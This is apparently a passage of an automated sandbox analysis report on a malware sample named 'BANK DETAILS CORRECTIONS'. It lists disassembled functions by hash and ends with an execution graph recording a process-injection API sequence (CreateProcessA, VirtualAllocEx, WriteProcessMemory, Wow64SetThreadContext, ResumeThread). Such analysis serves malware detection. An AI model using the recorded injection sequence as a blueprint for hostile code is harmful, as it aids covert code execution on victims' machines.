                                                                                    • Opcode Fuzzy Hash: a0922d167b1869cdb5ee7429ead6bfe1b842d02d426a0ce85921c364442a8b5d
                                                                                    • Instruction Fuzzy Hash: FB90023520150402D5147158580C646408A9BD0301F55D421A0464558DC65489A1A221
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 64dd93b18073fb171142489e2d078bde61a18f686bc14a4a0fe1910d473d5460
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: f2eb0563d481106e97a5b985ee4f2bb7b61009eead70dc55ee89e8fb1afb2c36
                                                                                    • Instruction ID: e74de5e02ab319e598a5788a4d1548cbb696e8bf48efe98f86ea3f4d5edf8fd2
                                                                                    • Opcode Fuzzy Hash: f2eb0563d481106e97a5b985ee4f2bb7b61009eead70dc55ee89e8fb1afb2c36
                                                                                    • Instruction Fuzzy Hash: 9D51D4B2A00116AFDB11DF9C899097EFBBCBB88241754C529E56DD7641D334DE40CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 91126317ac7baef9649076ab94eb5e28c8d9f89d181de17db363d6b70ff7b2f6
                                                                                    • Instruction ID: 55fe9a7eec25cf2ac3ec531cd9fb7564c1f7b67220f801fef3a92b6110276d5b
                                                                                    • Opcode Fuzzy Hash: 91126317ac7baef9649076ab94eb5e28c8d9f89d181de17db363d6b70ff7b2f6
                                                                                    • Instruction Fuzzy Hash: 82511571A00646AECB31DF9DC99097FBBFCEF84201B44C869E99ED7641E674EA408760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01957630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01994655
                                                                                    • ExecuteOptions, xrefs: 019946A0
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01994787
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01994725
                                                                                    • Execute=1, xrefs: 01994713
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019946FC
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01994742
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: 0fe686b166840e37684ec5515edf7d9e83eca5131b93a89d51be3ee1619ba7ba
                                                                                    • Instruction ID: 7d3637f4a1718326971b2f2acb72d19c406c757734a5aecceb98f861ae815324
                                                                                    • Opcode Fuzzy Hash: 0fe686b166840e37684ec5515edf7d9e83eca5131b93a89d51be3ee1619ba7ba
                                                                                    • Instruction Fuzzy Hash: 56513931A0121AAEEF15EBE8EC85FAD77ACAF54304F4400A9DA0DB7180D7719B45CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0196B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: ee19f4abbc2c29ff2ff48aeec0ec0b4f81085ba473c007ff7f49f2a9e0818db9
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 0E81C230F0524A8EEF258E6CC8517FEBBBDAF45321F18451AD95BE7691E73488408B71
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$[$]:%u
                                                                                    • API String ID: 48624451-2819853543
                                                                                    • Opcode ID: 4b5f49604b728e689ad5dd78c0e542f8617b866000be49502d6c09696e68c531
                                                                                    • Instruction ID: 90a4cefdcde9a22895b278d652eccd1ef3ed06bc6186afbe5f47ed3061ee2428
                                                                                    • Opcode Fuzzy Hash: 4b5f49604b728e689ad5dd78c0e542f8617b866000be49502d6c09696e68c531
                                                                                    • Instruction Fuzzy Hash: 0421357AE00119ABDB11DF79DC40AEEBBFCFF54654F484116E919E3204E730DA018BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0194F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019902E7
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019902BD
                                                                                    • RTL: Re-Waiting, xrefs: 0199031E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 23e99cd629569d6367df7f72af44d44214c09aa1c9236ab5ab78aac83db85540
                                                                                    • Instruction ID: 252845fa34aa15af2b669445969e96c2c7c40e0750cf4c7973644951302cab28
                                                                                    • Opcode Fuzzy Hash: 23e99cd629569d6367df7f72af44d44214c09aa1c9236ab5ab78aac83db85540
                                                                                    • Instruction Fuzzy Hash: 02E1AD706047429FEB25CF2CC885F2ABBE8BF84314F180A59F5A98B2E1D774D945CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01997B7F
                                                                                    • RTL: Resource at %p, xrefs: 01997B8E
                                                                                    • RTL: Re-Waiting, xrefs: 01997BAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: 7f6c07d9d7d7ebf707ae407d878af718f9454c5a980898f9b3b19d9aef39eeb9
                                                                                    • Instruction ID: 4830bfa47d5841ed5b04a5b5ecda2332662194aaaa677a578a12b6e3d007db5e
                                                                                    • Opcode Fuzzy Hash: 7f6c07d9d7d7ebf707ae407d878af718f9454c5a980898f9b3b19d9aef39eeb9
                                                                                    • Instruction Fuzzy Hash: 6C41C2317007029FDB25DE29D840B6AB7EAEF98711F100A1DEE5EA7680DB71E4058B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0199728C
                                                                                    Strings
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01997294
                                                                                    • RTL: Resource at %p, xrefs: 019972A3
                                                                                    • RTL: Re-Waiting, xrefs: 019972C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 92580e12b59115f8cddc53472d9b2888d2599b895d39298fc630cfb1689195c0
                                                                                    • Instruction ID: 69fc7be00a60f2fc1720073e6e7d7d0d53e4b976a54f69c92d862ebdf710b2ee
                                                                                    • Opcode Fuzzy Hash: 92580e12b59115f8cddc53472d9b2888d2599b895d39298fc630cfb1689195c0
                                                                                    • Instruction Fuzzy Hash: D841F431710206ABDB25CE69CC41F6ABBA5FF94711F100619FD5DA7240DB21E816CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: b8094a3e59f775e1bd1e9a8b6447ce3a519aefc32447f6541c3479f2443b6238
                                                                                    • Instruction ID: e7326a50f30fab4e9343e4f6e6650b9cf340a6c4700cda8d6cc20398ee204d11
                                                                                    • Opcode Fuzzy Hash: b8094a3e59f775e1bd1e9a8b6447ce3a519aefc32447f6541c3479f2443b6238
                                                                                    • Instruction Fuzzy Hash: 8B317376A002199FDB20DF29CC40BEEB7BCAB54611F444556E94DE3200EF309A448BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01967D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: a474a88b8179f966e793e43784aea763e9afef06f3dcf0605bda5081af11b29e
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 8491D670E002069BEB29CFADC890ABEBBADEF44725F14491AE95DE72D0D73499408771
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01929126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 472c6fc72625a01aecb6c759ecbd1126589f2ee162b712212acdfa8d07656fd8
                                                                                    • Instruction ID: 85ee35552164863a98d0889c21608f8919eaa0759398bd95f96fd794c3c5e0c6
                                                                                    • Opcode Fuzzy Hash: 472c6fc72625a01aecb6c759ecbd1126589f2ee162b712212acdfa8d07656fd8
                                                                                    • Instruction Fuzzy Hash: A9811975D002799BDB31DB54CC44BEABAB8AF49714F1041EAEA1DB7240D7709E85CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 019ACFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8
                                                                                    • String ID: @$@4rw@4rw
                                                                                    • API String ID: 4062629308-2979693914
                                                                                    • Opcode ID: 9938afca379be3cb8d1f71a1816f923f6521a913f4f963022d04871ada954842
                                                                                    • Instruction ID: 96a7fed9ebe167b10b79ced584561e20a320a0f062dbca1561162129e699c918
                                                                                    • Opcode Fuzzy Hash: 9938afca379be3cb8d1f71a1816f923f6521a913f4f963022d04871ada954842
                                                                                    • Instruction Fuzzy Hash: 4A41E475940225EFDB21DFE9C840AADBBF8FF98B10F00442AE909DB254D734D905CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:230
                                                                                    Total number of Limit Nodes:9
                                                                                    execution_graph 52816 6f8b728 52817 6f8b8b3 52816->52817 52819 6f8b74e 52816->52819 52819->52817 52820 6f8b318 52819->52820 52821 6f8b9a8 PostMessageW 52820->52821 52822 6f8ba14 52821->52822 52822->52819 52599 6f883b9 52605 6f8a128 52599->52605 52620 6f8a0f3 52599->52620 52635 6f8a18e 52599->52635 52651 6f8a118 52599->52651 52600 6f883c8 52606 6f8a130 52605->52606 52607 6f8a14a 52606->52607 52666 6f8a9ba 52606->52666 52674 6f8a662 52606->52674 52679 6f8abe9 52606->52679 52684 6f8a629 52606->52684 52688 6f8a615 52606->52688 52693 6f8a7d3 52606->52693 52698 6f8a952 52606->52698 52703 6f8a59e 52606->52703 52707 6f8ad7e 52606->52707 52711 6f8ab1d 52606->52711 52716 6f8a7fc 52606->52716 52722 6f8ac5b 52606->52722 52607->52600 52621 6f8a0fc 52620->52621 52622 6f8a0fe 52620->52622 52621->52622 52623 6f8a9ba 4 API calls 52621->52623 52624 6f8ac5b 2 API calls 52621->52624 52625 6f8a7fc 2 API calls 52621->52625 52626 6f8ab1d 2 API calls 52621->52626 52627 6f8ad7e 2 API calls 52621->52627 52628 6f8a59e 2 API calls 52621->52628 52629 6f8a952 2 API calls 52621->52629 52630 6f8a7d3 2 API calls 52621->52630 52631 6f8a615 2 API calls 52621->52631 52632 6f8a629 2 API calls 52621->52632 52633 6f8abe9 2 API calls 52621->52633 52634 6f8a662 2 API calls 52621->52634 52622->52600 52623->52622 52624->52622 52625->52622 52626->52622 52627->52622 52628->52622 52629->52622 52630->52622 52631->52622 52632->52622 52633->52622 52634->52622 52636 6f8a11c 52635->52636 52638 6f8a191 52635->52638 52637 6f8a14a 52636->52637 52639 6f8a9ba 4 API calls 52636->52639 52640 6f8ac5b 2 API calls 52636->52640 52641 6f8a7fc 2 API calls 52636->52641 52642 6f8ab1d 2 API calls 52636->52642 52643 6f8ad7e 2 API calls 52636->52643 52644 6f8a59e 2 API calls 52636->52644 52645 6f8a952 2 API calls 52636->52645 52646 6f8a7d3 2 API calls 52636->52646 52647 6f8a615 2 API calls 52636->52647 52648 6f8a629 2 API calls 52636->52648 52649 6f8abe9 2 API calls 52636->52649 52650 6f8a662 2 API calls 52636->52650 52637->52600 52638->52600 52639->52637 52640->52637 52641->52637 52642->52637 52643->52637 52644->52637 52645->52637 52646->52637 52647->52637 52648->52637 52649->52637 52650->52637 52652 6f8a142 52651->52652 52653 6f8a14a 52652->52653 52654 6f8a9ba 4 API calls 52652->52654 52655 6f8ac5b 2 API calls 52652->52655 52656 6f8a7fc 2 API calls 52652->52656 52657 6f8ab1d 2 API calls 52652->52657 52658 6f8ad7e 2 API calls 52652->52658 52659 6f8a59e 2 API calls 52652->52659 52660 6f8a952 2 API calls 52652->52660 52661 6f8a7d3 2 API calls 52652->52661 52662 6f8a615 2 API calls 52652->52662 52663 6f8a629 2 API calls 52652->52663 52664 6f8abe9 2 API calls 52652->52664 52665 6f8a662 2 API calls 52652->52665 52653->52600 52654->52653 52655->52653 52656->52653 52657->52653 52658->52653 52659->52653 52660->52653 52661->52653 52662->52653 52663->52653 52664->52653 52665->52653 52726 6f87ca9 52666->52726 52730 6f87cb0 52666->52730 52667 6f8a9dc 52668 6f8ae74 52667->52668 52734 6f87af8 52667->52734 52738 6f87b00 52667->52738 52668->52607 52669 6f8ac46 52669->52607 52675 6f8a668 52674->52675 52742 6f8753b 52675->52742 52746 6f87540 52675->52746 52676 6f8a5fd 52676->52607 52680 6f8ac01 52679->52680 52682 6f87af8 VirtualAllocEx 52680->52682 52683 6f87b00 VirtualAllocEx 52680->52683 52681 6f8ac46 52681->52607 52682->52681 52683->52681 52750 6f875eb 52684->52750 52754 6f875f0 52684->52754 52685 6f8a643 52685->52607 52689 6f8a622 52688->52689 52758 6f87bb9 52689->52758 52762 6f87bc0 52689->52762 52690 6f8a991 52694 6f8a7f6 52693->52694 52696 6f87bb9 WriteProcessMemory 52694->52696 52697 6f87bc0 WriteProcessMemory 52694->52697 52695 6f8aa27 52695->52607 52696->52695 52697->52695 52699 6f8a958 52698->52699 52701 6f87bb9 WriteProcessMemory 52699->52701 52702 6f87bc0 WriteProcessMemory 52699->52702 52700 6f8a991 52701->52700 52702->52700 52766 6f87e48 52703->52766 52770 6f87e3d 52703->52770 52709 6f875eb Wow64SetThreadContext 52707->52709 52710 6f875f0 Wow64SetThreadContext 52707->52710 52708 6f8ad98 52709->52708 52710->52708 52712 6f8ab2a 52711->52712 52714 6f87af8 VirtualAllocEx 52712->52714 52715 6f87b00 VirtualAllocEx 52712->52715 52713 6f8ac46 52713->52607 52714->52713 52715->52713 52717 6f8a679 52716->52717 52718 6f8aeb8 52717->52718 52720 6f8753b ResumeThread 52717->52720 52721 6f87540 ResumeThread 52717->52721 52718->52607 52719 6f8a5fd 52719->52607 52720->52719 52721->52719 52724 6f87bb9 WriteProcessMemory 52722->52724 52725 6f87bc0 WriteProcessMemory 52722->52725 52723 6f8ac7f 52724->52723 52725->52723 52727 6f87cfb ReadProcessMemory 52726->52727 52729 6f87d3f 52727->52729 52729->52667 52731 6f87cfb ReadProcessMemory 52730->52731 52733 6f87d3f 52731->52733 52733->52667 52735 6f87b40 VirtualAllocEx 52734->52735 52737 6f87b7d 52735->52737 52737->52669 52739 6f87b40 VirtualAllocEx 52738->52739 52741 6f87b7d 52739->52741 52741->52669 52743 6f87580 ResumeThread 52742->52743 52745 6f875b1 52743->52745 52745->52676 52747 6f87580 ResumeThread 52746->52747 52749 6f875b1 52747->52749 52749->52676 52751 6f87635 Wow64SetThreadContext 52750->52751 52753 6f8767d 52751->52753 52753->52685 52755 6f87635 Wow64SetThreadContext 52754->52755 52757 6f8767d 52755->52757 52757->52685 52759 6f87c08 WriteProcessMemory 52758->52759 52761 6f87c5f 52759->52761 52761->52690 52763 6f87c08 WriteProcessMemory 52762->52763 52765 6f87c5f 52763->52765 52765->52690 52767 6f87ed1 CreateProcessA 52766->52767 52769 6f88093 52767->52769 52771 6f87ed1 CreateProcessA 52770->52771 52773 6f88093 52771->52773 52774 4bcd0f8 52775 4bcd13e 52774->52775 52778 4bcd2d8 52775->52778 52781 4bcc9e0 52778->52781 52782 4bcd340 DuplicateHandle 52781->52782 52783 4bcd22b 52782->52783 52784 4bcad78 52788 4bcae6f 52784->52788 52796 4bcae70 52784->52796 52785 4bcad87 52789 4bcaea4 52788->52789 52790 4bcae81 52788->52790 52789->52785 52790->52789 52804 4bcb0f8 52790->52804 52808 4bcb108 52790->52808 52791 4bcb0a8 GetModuleHandleW 52793 4bcb0d5 52791->52793 52792 4bcae9c 52792->52789 52792->52791 52793->52785 52797 4bcae81 52796->52797 52798 4bcaea4 52796->52798 52797->52798 52802 4bcb0f8 LoadLibraryExW 52797->52802 52803 4bcb108 LoadLibraryExW 52797->52803 52798->52785 52799 4bcae9c 52799->52798 52800 4bcb0a8 GetModuleHandleW 52799->52800 52801 4bcb0d5 52800->52801 52801->52785 52802->52799 52803->52799 52806 4bcb108 52804->52806 52805 4bcb141 52805->52792 52806->52805 52812 4bca8b0 52806->52812 52809 4bcb11c 52808->52809 52810 4bcb141 52809->52810 52811 4bca8b0 LoadLibraryExW 52809->52811 52810->52792 52811->52810 52813 4bcb2e8 LoadLibraryExW 52812->52813 52815 4bcb361 52813->52815 52815->52805 52823 4bc4668 52824 4bc467a 52823->52824 52825 4bc4686 52824->52825 52827 4bc4778 52824->52827 52828 4bc479d 52827->52828 52832 4bc4888 52828->52832 52836 4bc4878 52828->52836 52833 4bc48af 52832->52833 52835 4bc498c 52833->52835 52840 4bc449c 52833->52840 52838 4bc48af 52836->52838 52837 4bc498c 52838->52837 52839 4bc449c CreateActCtxA 52838->52839 52839->52837 52841 4bc5918 CreateActCtxA 52840->52841 52843 4bc59db 52841->52843 52547 b5d01c 52548 b5d034 52547->52548 52549 b5d08e 52548->52549 52552 4cd2c08 52548->52552 52561 4cd0ad4 52548->52561 52555 4cd2c45 52552->52555 52553 4cd2c79 52586 4cd0bfc 52553->52586 52555->52553 52556 4cd2c69 52555->52556 52570 4cd2da0 52556->52570 52575 4cd2d91 52556->52575 52580 4cd2e6c 52556->52580 52557 4cd2c77 52557->52557 52562 4cd0adf 52561->52562 52563 4cd2c79 52562->52563 52565 4cd2c69 52562->52565 52564 4cd0bfc CallWindowProcW 52563->52564 52566 4cd2c77 52564->52566 52567 4cd2e6c CallWindowProcW 52565->52567 52568 4cd2d91 CallWindowProcW 52565->52568 52569 4cd2da0 CallWindowProcW 52565->52569 52566->52566 52567->52566 52568->52566 52569->52566 52572 4cd2db4 52570->52572 52571 4cd2e40 52571->52557 52590 4cd2e58 52572->52590 52593 4cd2e47 52572->52593 52577 4cd2db4 52575->52577 52576 4cd2e40 52576->52557 52578 4cd2e58 CallWindowProcW 52577->52578 52579 4cd2e47 CallWindowProcW 52577->52579 52578->52576 52579->52576 52581 4cd2e2a 52580->52581 52582 4cd2e7a 52580->52582 52584 4cd2e58 CallWindowProcW 52581->52584 52585 4cd2e47 CallWindowProcW 52581->52585 52583 4cd2e40 52583->52557 52584->52583 52585->52583 52587 4cd0c07 52586->52587 52588 4cd435a CallWindowProcW 52587->52588 52589 4cd4309 52587->52589 52588->52589 52589->52557 52591 4cd2e69 52590->52591 52596 4cd42a0 52590->52596 52591->52571 52594 4cd2e69 52593->52594 52595 4cd42a0 CallWindowProcW 52593->52595 52594->52571 52595->52594 52597 4cd0bfc CallWindowProcW 52596->52597 52598 4cd42aa 52597->52598 52598->52591

                                                                                    Executed Functions

                                                                                    Function 04D2C6E0 Relevance: .4, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b1f7b78af2090f22705595611db654c7b7683ba6f98fcd95dd60784104f35a74
                                                                                    • Instruction ID: 3e46dcd5cdef2c793e5ca9a4d5b941c5054398097a6b8999375767a4f3cfc944
                                                                                    • Opcode Fuzzy Hash: b1f7b78af2090f22705595611db654c7b7683ba6f98fcd95dd60784104f35a74
                                                                                    • Instruction Fuzzy Hash: 0812B675D1072A8FCB15DF68C980AD9F7B1FF59304F1486AAD858A7211EB70AAC4CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D2C6D0 Relevance: .4, Instructions: 377COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1a74ce205f38b43507760c16b180359d4af9a5412925592bdf8d65ce72071234
                                                                                    • Instruction ID: 26c51623c2a97ca3c0d5ea57df07bea1ab83df41a0dddbdb3ce90a3ffcc2e316
                                                                                    • Opcode Fuzzy Hash: 1a74ce205f38b43507760c16b180359d4af9a5412925592bdf8d65ce72071234
                                                                                    • Instruction Fuzzy Hash: A412B675D1061A8FCB15DF68C980AD9F7B1FF99304F14C6AAD858A7211EB70AAC4CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

